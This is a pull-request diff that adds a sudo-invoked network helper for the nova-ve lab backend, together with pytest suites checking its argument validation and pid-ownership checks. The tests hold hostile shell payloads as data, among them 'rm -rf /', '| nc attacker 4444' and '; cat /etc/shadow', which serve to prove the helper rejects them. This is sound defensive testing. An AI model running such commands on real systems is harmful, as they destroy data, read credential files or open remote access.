### PR TITLE
US-201: nova-ve-net.py privileged helper + sudoers (#87)

### DIFF
--- a/backend/tests/test_host_net_argv_injection.py
+++ b/backend/tests/test_host_net_argv_injection.py
@@ -1,0 +1,142 @@
+"""US-201 — argv-injection table for ``deploy/nova-ve-net.py``.
+
+Confirms that classic shell-metacharacter payloads, command substitution
+syntax, NUL bytes, and length-overflow inputs all reject with exit code
+2 and produce zero side effects (no ``_run`` call).
+"""
+
+from __future__ import annotations
+
+import importlib.util
+import sys
+from pathlib import Path
+
+import pytest
+
+
+REPO_ROOT = Path(__file__).resolve().parents[2]
+HELPER_PATH = REPO_ROOT / "deploy" / "nova-ve-net.py"
+
+
+@pytest.fixture
+def helper(monkeypatch, tmp_path):
+    spec = importlib.util.spec_from_file_location("nova_ve_net_helper_inj", HELPER_PATH)
+    assert spec is not None and spec.loader is not None
+    mod = importlib.util.module_from_spec(spec)
+    sys.modules["nova_ve_net_helper_inj"] = mod
+    spec.loader.exec_module(mod)
+
+    pids_path = tmp_path / "pids.json"
+    proc_root = tmp_path / "proc"
+    proc_root.mkdir()
+    monkeypatch.setattr(mod, "PIDS_JSON_PATH", pids_path)
+    monkeypatch.setattr(mod, "PROC_ROOT", proc_root)
+
+    calls: list[list[str]] = []
+
+    def fake_run(argv):
+        calls.append(list(argv))
+        return 0
+
+    monkeypatch.setattr(mod, "_run", fake_run)
+    mod._test_calls = calls  # type: ignore[attr-defined]
+    return mod
+
+
+# Classic payloads that would be lethal if the helper used a shell.
+INJECTIONS: list[str] = [
+    '"; rm -rf /',
+    '$(rm -rf /)',
+    '`rm -rf /`',
+    '&& reboot',
+    '|| reboot',
+    '| nc attacker 4444',
+    '> /etc/passwd',
+    '< /etc/shadow',
+    '; cat /etc/shadow',
+    '\n/bin/sh',
+    '\r\nrm -rf /',
+    '\\$(rm -rf /)',
+    '${IFS}rm${IFS}-rf${IFS}/',
+    'novec0den1; rm -rf /',          # plausible-looking + payload
+    'novec0den1 && reboot',
+    'novec0den1\nnovec0den2',
+    'novec0den1\x00novec0den2',      # NUL byte
+    '../../etc/passwd',
+    '/dev/full',
+    'a' * 32,                        # IFNAMSIZ overflow
+    'novec0den' + '1' * 10,          # too many digits
+]
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_bridge_add_rejects_injection(helper, payload):
+    rc = helper.main(["bridge-add", payload])
+    assert rc == 2, f"payload accepted: {payload!r}"
+    assert not helper._test_calls, f"side effect from {payload!r}"
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_bridge_del_rejects_injection(helper, payload):
+    rc = helper.main(["bridge-del", payload])
+    assert rc == 2, f"payload accepted: {payload!r}"
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_tap_add_rejects_injection(helper, payload):
+    rc = helper.main(["tap-add", payload])
+    assert rc == 2, f"payload accepted: {payload!r}"
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_veth_pair_rejects_injection_in_hostend(helper, payload):
+    rc = helper.main(["veth-pair-add", payload, "nve0000d1i1p"])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_veth_pair_rejects_injection_in_peerend(helper, payload):
+    rc = helper.main(["veth-pair-add", "nve0000d1i1h", payload])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_link_master_rejects_injection(helper, payload):
+    rc = helper.main(["link-master", payload, "novec0den1"])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_addr_add_rejects_injection_in_cidr(helper, payload):
+    rc = helper.main(["addr-add-in-netns", "4242", "eth0", payload])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_link_netns_rejects_injection_in_pid(helper, payload):
+    rc = helper.main(["link-netns", "nve0000d1i1p", payload])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize("payload", INJECTIONS)
+def test_link_set_name_rejects_injection_in_newname(helper, payload):
+    rc = helper.main(["link-set-name-in-netns", "4242", "nve0000d1i1p", payload])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+def test_helper_uses_subprocess_without_shell(helper):
+    """Static guard: deploy/nova-ve-net.py must never set ``shell=True``."""
+    src = HELPER_PATH.read_text()
+    # Forbid both raw and whitespace variants of shell=True.
+    for forbidden in ("shell=True", "shell = True"):
+        assert forbidden not in src, f"helper contains {forbidden!r}"
+    # Sanity: the explicit ``shell=False`` argument is present.
+    assert "shell=False" in src

--- a/backend/tests/test_host_net_pid_ownership_diagnostic.py
+++ b/backend/tests/test_host_net_pid_ownership_diagnostic.py
@@ -1,0 +1,222 @@
+"""US-201 — pid-ownership diagnostic & registry tests.
+
+Covers:
+  * Missing ``pids.json`` -> deny all pid-taking verbs.
+  * Corrupted JSON in ``pids.json`` -> deny all + diagnostic on stderr.
+  * Pid in registry but cgroup/comm fingerprint does not match -> deny.
+  * Pid in registry AND cgroup matches docker (v1, v2-cgroupfs, v2-systemd,
+    crio) -> allow.
+  * Pid in registry AND comm matches ``qemu-system-*`` -> allow.
+  * Diagnostic on failure includes /proc/<pid>/comm (truncated to 80 chars),
+    first 5 lines of /proc/<pid>/cgroup, and the expected-fingerprints
+    summary line.
+"""
+
+from __future__ import annotations
+
+import importlib.util
+import json
+import sys
+from pathlib import Path
+
+import pytest
+
+
+REPO_ROOT = Path(__file__).resolve().parents[2]
+HELPER_PATH = REPO_ROOT / "deploy" / "nova-ve-net.py"
+
+
+@pytest.fixture
+def helper(monkeypatch, tmp_path):
+    spec = importlib.util.spec_from_file_location("nova_ve_net_helper_pid", HELPER_PATH)
+    assert spec is not None and spec.loader is not None
+    mod = importlib.util.module_from_spec(spec)
+    sys.modules["nova_ve_net_helper_pid"] = mod
+    spec.loader.exec_module(mod)
+
+    pids_path = tmp_path / "pids.json"
+    proc_root = tmp_path / "proc"
+    proc_root.mkdir()
+    monkeypatch.setattr(mod, "PIDS_JSON_PATH", pids_path)
+    monkeypatch.setattr(mod, "PROC_ROOT", proc_root)
+
+    calls: list[list[str]] = []
+    monkeypatch.setattr(mod, "_run", lambda argv: calls.append(list(argv)) or 0)
+
+    mod._test_calls = calls  # type: ignore[attr-defined]
+    mod._test_pids_path = pids_path  # type: ignore[attr-defined]
+    mod._test_proc_root = proc_root  # type: ignore[attr-defined]
+    return mod
+
+
+def _seed_proc(helper, pid: int, cgroup: str, comm: str) -> None:
+    pid_dir: Path = helper._test_proc_root / str(pid)
+    pid_dir.mkdir(parents=True, exist_ok=True)
+    (pid_dir / "cgroup").write_text(cgroup)
+    (pid_dir / "comm").write_text(comm)
+
+
+def _seed_registry(helper, pid: int, *, kind: str = "docker") -> None:
+    helper._test_pids_path.write_text(
+        json.dumps(
+            [
+                {
+                    "pid": pid,
+                    "kind": kind,
+                    "lab_id": "lab-test",
+                    "node_id": "node-test",
+                    "started_at": 0,
+                    "generation": 1,
+                }
+            ]
+        )
+    )
+
+
+# ---------------------------------------------------------------------------
+# Registry-file failure modes (deny all)
+# ---------------------------------------------------------------------------
+
+
+def test_missing_pids_json_denies_all(helper, capsys):
+    # No registry written.
+    _seed_proc(helper, 4242, "0::/system.slice/docker-abc.scope\n", "docker\n")
+    rc = helper.main(["link-netns", "nve0000d1i1p", "4242"])
+    assert rc == 2
+    err = capsys.readouterr().err
+    assert "pid ownership check FAILED" in err
+    assert not helper._test_calls
+
+
+def test_corrupted_pids_json_denies_all(helper, capsys):
+    helper._test_pids_path.write_text("{not valid json")
+    _seed_proc(helper, 4242, "0::/system.slice/docker-abc.scope\n", "docker\n")
+    rc = helper.main(["link-netns", "nve0000d1i1p", "4242"])
+    assert rc == 2
+    err = capsys.readouterr().err
+    # Two stderr emissions: the corrupted-json warning AND the standard
+    # ownership-failure diagnostic.
+    assert "pids.json corrupted" in err
+    assert "pid ownership check FAILED" in err
+    assert not helper._test_calls
+
+
+def test_non_list_pids_json_denies_all(helper, capsys):
+    helper._test_pids_path.write_text(json.dumps({"pid": 4242}))
+    _seed_proc(helper, 4242, "0::/system.slice/docker-abc.scope\n", "docker\n")
+    rc = helper.main(["link-netns", "nve0000d1i1p", "4242"])
+    assert rc == 2
+    err = capsys.readouterr().err
+    assert "pids.json malformed" in err
+    assert not helper._test_calls
+
+
+# ---------------------------------------------------------------------------
+# Cgroup fingerprint matrix (defense-in-depth secondary check)
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "cgroup",
+    [
+        # cgroup v1 cgroupfs (docker)
+        "11:devices:/docker/abcdef0123456789abcdef0123456789\n",
+        # cgroup v2 cgroupfs (docker)
+        "0::/docker/abcdef0123456789abcdef0123456789\n",
+        # cgroup v2 systemd (docker — Ubuntu 26.04 default)
+        "0::/system.slice/docker-abcdef0123456789abcdef.scope\n",
+        # cgroup v2 systemd (containerd)
+        "0::/system.slice/containerd-abcdef0123456789abcdef.scope\n",
+        # cgroup v1 (crio) — slash variant
+        "11:devices:/crio/abcdef0123456789abcdef\n",
+        # cgroup v1 (crio) — hyphen variant
+        "11:devices:/crio-abcdef0123456789abcdef.scope\n",
+    ],
+)
+def test_authorized_pid_with_matching_cgroup_passes(helper, cgroup):
+    _seed_registry(helper, 4242)
+    _seed_proc(helper, 4242, cgroup, "anything\n")
+    rc = helper.main(["link-netns", "nve0000d1i1p", "4242"])
+    assert rc == 0
+    assert helper._test_calls
+
+
+def test_qemu_pid_via_comm_matches(helper):
+    _seed_registry(helper, 5555, kind="qemu")
+    # cgroup is unrelated; QEMU runs under user.slice on most distros.
+    _seed_proc(helper, 5555, "0::/user.slice/user-1000.slice\n", "qemu-system-x86_64\n")
+    rc = helper.main(["link-netns", "nve0000d1i1p", "5555"])
+    assert rc == 0
+    assert helper._test_calls
+
+
+def test_registered_pid_but_no_cgroup_match_denied(helper, capsys):
+    # Pid is in registry (e.g. recycled after process restart) but cgroup
+    # fingerprint indicates a non-container, non-qemu process.  Deny.
+    _seed_registry(helper, 6000)
+    _seed_proc(helper, 6000, "0::/user.slice/user-1000.slice/session-3.scope\n", "bash\n")
+    rc = helper.main(["link-netns", "nve0000d1i1p", "6000"])
+    assert rc == 2
+    err = capsys.readouterr().err
+    assert "pid ownership check FAILED for pid=6000" in err
+    assert not helper._test_calls
+
+
+# ---------------------------------------------------------------------------
+# Diagnostic format (Critic iter-2 Major #1 fix)
+# ---------------------------------------------------------------------------
+
+
+def test_diagnostic_block_for_unregistered_pid(helper, capsys):
+    _seed_proc(
+        helper,
+        7777,
+        "12:cpuset:/\n11:hugetlb:/\n10:cpu,cpuacct:/\n9:pids:/\n8:rdma:/\n7:devices:/\n",
+        "some-binary-name\n",
+    )
+    rc = helper.main(["link-netns", "nve0000d1i1p", "7777"])
+    assert rc == 2
+    err = capsys.readouterr().err
+
+    # Required diagnostic lines per US-201.
+    assert "pid ownership check FAILED for pid=7777" in err
+    assert "/proc/7777/comm: some-binary-name" in err
+    assert "/proc/7777/cgroup (first 5 lines):" in err
+    # Should include exactly the first 5 lines, not all 6.
+    assert "12:cpuset:/" in err
+    assert "11:hugetlb:/" in err
+    assert "10:cpu,cpuacct:/" in err
+    assert "9:pids:/" in err
+    assert "8:rdma:/" in err
+    assert "7:devices:/" not in err  # 6th line MUST be truncated
+    assert "expected one of:" in err
+    assert "docker[/-]<hex>" in err
+    assert "docker-<hex>.scope" in err
+    assert "containerd-<hex>.scope" in err
+    assert "crio[/-]<hex>" in err
+    assert "qemu-system-*" in err
+
+
+def test_diagnostic_truncates_long_comm(helper, capsys):
+    long_comm = "x" * 200
+    _seed_proc(helper, 8888, "0::/foo\n", long_comm + "\n")
+    rc = helper.main(["link-netns", "nve0000d1i1p", "8888"])
+    assert rc == 2
+    err = capsys.readouterr().err
+    # Find the comm diagnostic line and verify ≤80 chars after the prefix.
+    line = next(
+        line for line in err.splitlines() if line.startswith(f"  /proc/8888/comm: ")
+    )
+    suffix = line[len(f"  /proc/8888/comm: "):]
+    assert len(suffix) <= 80
+
+
+def test_diagnostic_when_proc_missing(helper, capsys):
+    # No /proc/<pid> directory exists; helper must still emit a diagnostic
+    # rather than crash.
+    rc = helper.main(["link-netns", "nve0000d1i1p", "9999"])
+    assert rc == 2
+    err = capsys.readouterr().err
+    assert "pid ownership check FAILED for pid=9999" in err
+    # /proc/<pid>/comm: <empty>
+    assert "/proc/9999/comm:" in err

--- a/backend/tests/test_nova_ve_net_helper.py
+++ b/backend/tests/test_nova_ve_net_helper.py
@@ -1,0 +1,357 @@
+"""Unit tests for ``deploy/nova-ve-net.py`` — the US-201 privileged helper.
+
+These tests cover the helper in isolation:
+  * each verb's argparse + regex validation;
+  * regex rejection of malformed argv;
+  * unknown verb -> argparse exit (non-zero);
+  * pid-ownership check rejects pids missing from the registry.
+
+The tests NEVER actually invoke ``ip`` / ``nsenter`` — the helper module
+exposes a ``_run`` shim that we monkey-patch so each test records which
+argv WOULD have been spawned.
+"""
+
+from __future__ import annotations
+
+import importlib.util
+import json
+import sys
+from pathlib import Path
+
+import pytest
+
+
+REPO_ROOT = Path(__file__).resolve().parents[2]
+HELPER_PATH = REPO_ROOT / "deploy" / "nova-ve-net.py"
+
+
+@pytest.fixture
+def helper(monkeypatch, tmp_path):
+    """Load the helper as a module without executing it as __main__."""
+    # Load the file under a stable module name; importlib does the rest.
+    spec = importlib.util.spec_from_file_location("nova_ve_net_helper", HELPER_PATH)
+    assert spec is not None and spec.loader is not None
+    mod = importlib.util.module_from_spec(spec)
+    sys.modules["nova_ve_net_helper"] = mod
+    spec.loader.exec_module(mod)
+
+    # Redirect the registry + /proc to a writable tmp tree.
+    pids_path = tmp_path / "pids.json"
+    proc_root = tmp_path / "proc"
+    proc_root.mkdir()
+    monkeypatch.setattr(mod, "PIDS_JSON_PATH", pids_path, raising=True)
+    monkeypatch.setattr(mod, "PROC_ROOT", proc_root, raising=True)
+
+    # Capture the argv that WOULD have been run — never actually fork.
+    calls: list[list[str]] = []
+
+    def fake_run(argv):
+        calls.append(list(argv))
+        return 0
+
+    monkeypatch.setattr(mod, "_run", fake_run, raising=True)
+
+    mod._test_calls = calls  # type: ignore[attr-defined]
+    mod._test_pids_path = pids_path  # type: ignore[attr-defined]
+    mod._test_proc_root = proc_root  # type: ignore[attr-defined]
+    return mod
+
+
+def _seed_pid(mod, pid: int, *, kind: str = "docker", cgroup: str | None = None) -> None:
+    """Register ``pid`` in the registry and seed /proc cgroup data."""
+    pids_path: Path = mod._test_pids_path
+    proc_root: Path = mod._test_proc_root
+    existing = []
+    if pids_path.exists():
+        existing = json.loads(pids_path.read_text())
+    existing.append(
+        {
+            "pid": pid,
+            "kind": kind,
+            "lab_id": "lab-test",
+            "node_id": "node-test",
+            "started_at": 0,
+            "generation": 1,
+        }
+    )
+    pids_path.write_text(json.dumps(existing))
+
+    pid_dir = proc_root / str(pid)
+    pid_dir.mkdir(parents=True, exist_ok=True)
+    if cgroup is None:
+        if kind == "docker":
+            cgroup = "0::/system.slice/docker-abcdef0123456789.scope\n"
+        else:
+            cgroup = "0::/system.slice/user.slice\n"
+    (pid_dir / "cgroup").write_text(cgroup)
+    if kind == "qemu":
+        (pid_dir / "comm").write_text("qemu-system-x86_64\n")
+    else:
+        (pid_dir / "comm").write_text("dockerd-shim\n")
+
+
+# ---------------------------------------------------------------------------
+# Verb parsing + regex validation: positive paths
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    ("argv", "expected_argv_tail"),
+    [
+        (
+            ["bridge-add", "novec0den1"],
+            ["link", "add", "novec0den1", "type", "bridge"],
+        ),
+        (
+            ["bridge-del", "novec0den1"],
+            ["link", "del", "novec0den1"],
+        ),
+        (
+            ["tap-add", "nvec0ded1i2"],
+            ["tuntap", "add", "dev", "nvec0ded1i2", "mode", "tap"],
+        ),
+        (
+            ["tap-del", "nvec0ded1i2"],
+            ["link", "del", "nvec0ded1i2"],
+        ),
+        (
+            ["veth-pair-add", "nvec0ded1i2h", "nvec0ded1i2p"],
+            [
+                "link",
+                "add",
+                "nvec0ded1i2h",
+                "type",
+                "veth",
+                "peer",
+                "name",
+                "nvec0ded1i2p",
+            ],
+        ),
+        (
+            ["link-master", "nvec0ded1i2h", "novec0den1"],
+            ["link", "set", "nvec0ded1i2h", "master", "novec0den1"],
+        ),
+        (
+            ["link-set-nomaster", "nvec0ded1i2h"],
+            ["link", "set", "nvec0ded1i2h", "nomaster"],
+        ),
+        (
+            ["link-up", "nvec0ded1i2h"],
+            ["link", "set", "nvec0ded1i2h", "up"],
+        ),
+    ],
+)
+def test_non_pid_verbs_emit_correct_argv(helper, argv, expected_argv_tail):
+    rc = helper.main(argv)
+    assert rc == 0, f"verb {argv[0]} returned {rc}"
+    assert helper._test_calls, "helper did not invoke _run"
+    spawned = helper._test_calls[-1]
+    # First element is the ``ip`` binary path; tail must match exactly.
+    assert spawned[1:] == expected_argv_tail
+
+
+def test_link_netns_with_authorized_pid(helper):
+    _seed_pid(helper, 4242)
+    rc = helper.main(["link-netns", "nvec0ded1i2p", "4242"])
+    assert rc == 0
+    spawned = helper._test_calls[-1]
+    assert spawned[1:] == ["link", "set", "nvec0ded1i2p", "netns", "4242"]
+
+
+def test_link_set_name_in_netns_with_authorized_pid(helper):
+    _seed_pid(helper, 4242)
+    rc = helper.main(["link-set-name-in-netns", "4242", "nvec0ded1i2p", "eth1"])
+    assert rc == 0
+    spawned = helper._test_calls[-1]
+    # Expect ``nsenter -t 4242 -n ip link set <old> name <new>``
+    assert spawned[0].endswith("nsenter")
+    assert spawned[1:5] == ["-t", "4242", "-n", helper.IP_BIN]
+    assert spawned[5:] == ["link", "set", "nvec0ded1i2p", "name", "eth1"]
+
+
+def test_addr_add_in_netns_with_authorized_pid(helper):
+    _seed_pid(helper, 4242)
+    rc = helper.main(["addr-add-in-netns", "4242", "eth1", "10.99.1.5/24"])
+    assert rc == 0
+    spawned = helper._test_calls[-1]
+    assert spawned[5:] == ["addr", "add", "10.99.1.5/24", "dev", "eth1"]
+
+
+def test_addr_up_in_netns_with_authorized_pid(helper):
+    _seed_pid(helper, 4242)
+    rc = helper.main(["addr-up-in-netns", "4242", "eth1"])
+    assert rc == 0
+    spawned = helper._test_calls[-1]
+    assert spawned[5:] == ["link", "set", "eth1", "up"]
+
+
+def test_read_iface_mac_with_authorized_pid(helper):
+    _seed_pid(helper, 4242)
+    rc = helper.main(["read-iface-mac", "4242", "eth0"])
+    assert rc == 0
+    spawned = helper._test_calls[-1]
+    # nsenter -t <pid> -n cat /sys/class/net/<iface>/address
+    assert spawned[0].endswith("nsenter")
+    assert spawned[1:4] == ["-t", "4242", "-n"]
+    assert spawned[4] == "cat"
+    assert spawned[5] == "/sys/class/net/eth0/address"
+
+
+def test_read_iface_mac_for_qemu_pid(helper):
+    _seed_pid(helper, 5555, kind="qemu")
+    rc = helper.main(["read-iface-mac", "5555", "eth0"])
+    assert rc == 0
+
+
+# ---------------------------------------------------------------------------
+# Regex rejection: each verb refuses bad arguments
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "name",
+    [
+        "",                          # empty
+        "br0",                       # missing nove prefix
+        "noveZZZZn1",                # non-hex lab hash
+        "novedeadbeef",              # missing n<id>
+        "novedeadn",                 # missing id digits
+        "novedeadn123456",           # too many digits (>5)
+        "novedeadn1; rm -rf /",      # injection
+        "novedeadn1\nfoo",           # newline
+        "novedeadn1 ",               # trailing space
+        "noveDEADn1",                # uppercase hex
+    ],
+)
+def test_bridge_add_rejects_bad_name(helper, capsys, name):
+    rc = helper.main(["bridge-add", name])
+    assert rc == 2
+    assert not helper._test_calls
+    assert "argument failed validation" in capsys.readouterr().err
+
+
+@pytest.mark.parametrize(
+    "name",
+    [
+        "tap0",
+        "nve0000d1",                 # missing iface segment
+        "nve0000d1i",                # missing iface digits
+        "nve0000d1234i1",            # node too many digits
+        "nve0000d1i123",             # iface too many digits
+        "nve0000d1i1; reboot",       # injection
+    ],
+)
+def test_tap_add_rejects_bad_name(helper, name):
+    rc = helper.main(["tap-add", name])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+def test_veth_pair_rejects_identical_names(helper):
+    rc = helper.main(["veth-pair-add", "nve0000d1i1h", "nve0000d1i1h"])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize(
+    ("hostend", "peerend"),
+    [
+        ("nve0000d1i1h", "eth0"),                # peer not nova-ve shape
+        ("nve0000d1i1h", "nve0000d1i1x"),         # x suffix not h/p
+        ("nve0000d1i1H", "nve0000d1i1p"),         # uppercase
+    ],
+)
+def test_veth_pair_rejects_bad_arg(helper, hostend, peerend):
+    rc = helper.main(["veth-pair-add", hostend, peerend])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+@pytest.mark.parametrize(
+    "pid_str",
+    [
+        "0",                # too low
+        "1",                # init
+        "9",                # below floor
+        "12345678",         # 8 digits, too many
+        "abc",              # non-numeric
+        "-1",               # negative
+        "12 34",            # whitespace
+        "12;rm",            # injection
+    ],
+)
+def test_pid_taking_verbs_reject_bad_pid_shape(helper, pid_str):
+    # Even before registry lookup, the regex rejects.
+    rc = helper.main(["link-netns", "nve0000d1i1p", pid_str])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+def test_pid_taking_verb_rejects_unregistered_pid(helper, capsys):
+    # No _seed_pid call → registry is empty → reject.
+    rc = helper.main(["link-netns", "nve0000d1i1p", "4242"])
+    assert rc == 2
+    err = capsys.readouterr().err
+    assert "pid ownership check FAILED" in err
+    assert not helper._test_calls
+
+
+def test_addr_add_rejects_bad_cidr(helper):
+    _seed_pid(helper, 4242)
+    for bad in ["10.99.1.5", "10.99.1.5/33", "not-an-ip", "10.99.1.5/24; reboot"]:
+        helper._test_calls.clear()
+        rc = helper.main(["addr-add-in-netns", "4242", "eth1", bad])
+        assert rc == 2, f"cidr {bad!r} should have been rejected"
+        assert not helper._test_calls
+
+
+def test_addr_add_rejects_ipv6_cidr(helper):
+    _seed_pid(helper, 4242)
+    rc = helper.main(["addr-add-in-netns", "4242", "eth1", "fd00::1/64"])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+def test_netns_iface_rejects_non_eth(helper):
+    _seed_pid(helper, 4242)
+    rc = helper.main(["addr-up-in-netns", "4242", "lo"])
+    assert rc == 2
+    assert not helper._test_calls
+
+
+# ---------------------------------------------------------------------------
+# Unknown verb -> argparse exits non-zero
+# ---------------------------------------------------------------------------
+
+
+def test_unknown_verb_returns_nonzero(helper):
+    rc = helper.main(["wormhole-please", "anything"])
+    assert rc != 0
+    assert not helper._test_calls
+
+
+def test_no_verb_returns_nonzero(helper):
+    rc = helper.main([])
+    assert rc != 0
+    assert not helper._test_calls
+
+
+# ---------------------------------------------------------------------------
+# Iface-name validator covers both TAP and veth shapes
+# ---------------------------------------------------------------------------
+
+
+def test_link_master_accepts_tap_iface(helper):
+    rc = helper.main(["link-master", "nve0000d1i1", "novec0den1"])
+    assert rc == 0
+
+
+def test_link_master_accepts_veth_iface(helper):
+    rc = helper.main(["link-master", "nve0000d1i1h", "novec0den1"])
+    assert rc == 0
+
+
+def test_link_master_rejects_random_iface(helper):
+    rc = helper.main(["link-master", "eth0", "novec0den1"])
+    assert rc == 2
+    assert not helper._test_calls

--- a/deploy/nova-ve-net.py
+++ b/deploy/nova-ve-net.py
@@ -1,0 +1,518 @@
+#!/usr/bin/env python3
+"""nova-ve privileged network helper.
+
+Single privileged binary invoked via ``sudo`` from the un-privileged
+``nova-ve`` backend.  Exposes a *fixed* set of verbs — there is no generic
+``in-netns`` escape hatch.  Each verb maps to one ``ip`` (or ``nsenter ip``)
+invocation with all arguments validated against tight regular expressions
+before any subprocess is spawned.
+
+Authoritative spec: ``.omc/plans/network-runtime-wiring.md`` § US-201.
+
+The helper:
+
+* uses ``subprocess.run([...], shell=False)`` exclusively — argv is never
+  spliced into a shell string;
+* validates every argv argument against a tight regex (kernel
+  ``IFNAMSIZ=16`` → max 15 usable chars, plus argument-specific shape);
+* for verbs that take a *pid*, verifies pid ownership against the
+  nova-ve runtime registry at ``/var/lib/nova-ve/runtime/pids.json``;
+* exits ``2`` on any validation / ownership failure with a structured
+  diagnostic on stderr.
+
+Exit codes
+----------
+0   success
+2   argument failed validation OR pid ownership check failed
+3   unknown verb (argparse rejection)
+1   underlying ``ip`` / ``nsenter`` invocation failed
+"""
+
+from __future__ import annotations
+
+import argparse
+import ipaddress
+import json
+import os
+import re
+import subprocess
+import sys
+from pathlib import Path
+from typing import Callable, Mapping, Sequence
+
+
+# ---------------------------------------------------------------------------
+# Configuration
+# ---------------------------------------------------------------------------
+
+# Path to the nova-ve runtime pid registry.  Settable via env var so tests
+# can point at a tmp_path fixture.
+PIDS_JSON_PATH = Path(
+    os.environ.get("NOVA_VE_PIDS_JSON", "/var/lib/nova-ve/runtime/pids.json")
+)
+
+# Allow tests to override the path the helper uses to inspect /proc.
+PROC_ROOT = Path(os.environ.get("NOVA_VE_PROC_ROOT", "/proc"))
+
+# Allow tests to inject a fake ``ip`` / ``nsenter`` binary.  Production
+# leaves these as None so we use $PATH.
+IP_BIN = os.environ.get("NOVA_VE_IP_BIN") or "ip"
+NSENTER_BIN = os.environ.get("NOVA_VE_NSENTER_BIN") or "nsenter"
+
+
+# ---------------------------------------------------------------------------
+# Regex catalogue (single source of truth for argv shape)
+# ---------------------------------------------------------------------------
+
+# kernel IFNAMSIZ = 16 (incl NUL) → 15 usable.  Each format below caps to the
+# advertised length so overflow is impossible even if the regex is reused.
+
+# Bridge: nove<lab_hash:04x>n<network_id 1-5 digits>     max 14
+RE_BRIDGE_NAME = re.compile(r"^nove[a-f0-9]{4}n[0-9]{1,5}$")
+
+# TAP (QEMU): nve<lab_hash:04x>d<node 1-3>i<iface 1-2>     max 13
+RE_TAP_NAME = re.compile(r"^nve[a-f0-9]{4}d[0-9]{1,3}i[0-9]{1,2}$")
+
+# Veth host/peer: same as TAP plus h/p suffix                max 14
+RE_VETH_NAME = re.compile(r"^nve[a-f0-9]{4}d[0-9]{1,3}i[0-9]{1,2}[hp]$")
+
+# Container netns interface name: ethN where N is 0-99
+RE_NETNS_IFACE = re.compile(r"^eth[0-9]{1,2}$")
+
+# Pid: 1-7 digits.  Additional runtime checks reject pid<10 and pid==1.
+RE_PID = re.compile(r"^[0-9]{1,7}$")
+
+
+# Sentinel returned by validate_pid for pids in the kernel/init reserved
+# range or non-matching the registry.
+class _ValidationError(Exception):
+    """Raised by argument validators on regex / ownership failure."""
+
+
+# ---------------------------------------------------------------------------
+# Validators
+# ---------------------------------------------------------------------------
+
+
+def _check_regex(value: str, pattern: re.Pattern[str], label: str) -> str:
+    if not isinstance(value, str) or not pattern.match(value):
+        raise _ValidationError(label)
+    return value
+
+
+def validate_bridge_name(value: str) -> str:
+    return _check_regex(value, RE_BRIDGE_NAME, "bridge_name")
+
+
+def validate_tap_name(value: str) -> str:
+    return _check_regex(value, RE_TAP_NAME, "tap_name")
+
+
+def validate_veth_name(value: str, *, label: str = "veth_name") -> str:
+    return _check_regex(value, RE_VETH_NAME, label)
+
+
+def validate_iface_name(value: str, *, label: str = "iface_name") -> str:
+    """Accept any nova-ve-owned interface name (TAP or veth)."""
+    if RE_TAP_NAME.match(value) or RE_VETH_NAME.match(value):
+        return value
+    raise _ValidationError(label)
+
+
+def validate_netns_iface(value: str) -> str:
+    return _check_regex(value, RE_NETNS_IFACE, "netns_iface")
+
+
+def validate_pid_shape(value: str) -> int:
+    """Validate pid *shape* only (regex + reserved-range)."""
+    if not RE_PID.match(value or ""):
+        raise _ValidationError("pid")
+    pid = int(value)
+    # pid==1 is init/systemd, pid<10 covers kernel threads and the early
+    # systemd init range.  Refuse to operate on these even before
+    # consulting the registry.
+    if pid < 10 or pid == 1:
+        raise _ValidationError("pid")
+    return pid
+
+
+def validate_cidr(value: str) -> str:
+    """Accept a single IPv4 CIDR (e.g. 10.99.1.42/24).  IPv6 deferred."""
+    try:
+        iface = ipaddress.IPv4Interface(value)
+    except (ValueError, ipaddress.AddressValueError, ipaddress.NetmaskValueError):
+        raise _ValidationError("cidr")
+    # ipaddress accepts ``10.0.0.1`` (no /N) — require explicit prefix.
+    if "/" not in value:
+        raise _ValidationError("cidr")
+    # Reject prefix lengths that would be useless for container IPs.
+    if iface.network.prefixlen < 0 or iface.network.prefixlen > 32:
+        raise _ValidationError("cidr")
+    return f"{iface.ip}/{iface.network.prefixlen}"
+
+
+# ---------------------------------------------------------------------------
+# Pid ownership: registry + cgroup/comm defense-in-depth
+# ---------------------------------------------------------------------------
+
+
+def _load_pid_registry() -> list[dict]:
+    """Load the runtime pid registry.
+
+    Missing file or corrupted JSON → return ``[]`` (deny all).  A diagnostic
+    is emitted to stderr in the corrupted case so operators can spot it.
+    """
+    try:
+        raw = PIDS_JSON_PATH.read_text()
+    except FileNotFoundError:
+        return []
+    except OSError as exc:
+        print(
+            f"pids.json read failed: {exc}; denying all pid-taking verbs",
+            file=sys.stderr,
+        )
+        return []
+    try:
+        data = json.loads(raw)
+    except json.JSONDecodeError as exc:
+        print(
+            f"pids.json corrupted ({exc}); denying all pid-taking verbs",
+            file=sys.stderr,
+        )
+        return []
+    if not isinstance(data, list):
+        print(
+            "pids.json malformed (expected list); denying all pid-taking verbs",
+            file=sys.stderr,
+        )
+        return []
+    out: list[dict] = []
+    for entry in data:
+        if isinstance(entry, dict) and isinstance(entry.get("pid"), int):
+            out.append(entry)
+    return out
+
+
+def _registry_lookup(pid: int) -> dict | None:
+    for entry in _load_pid_registry():
+        if entry.get("pid") == pid:
+            return entry
+    return None
+
+
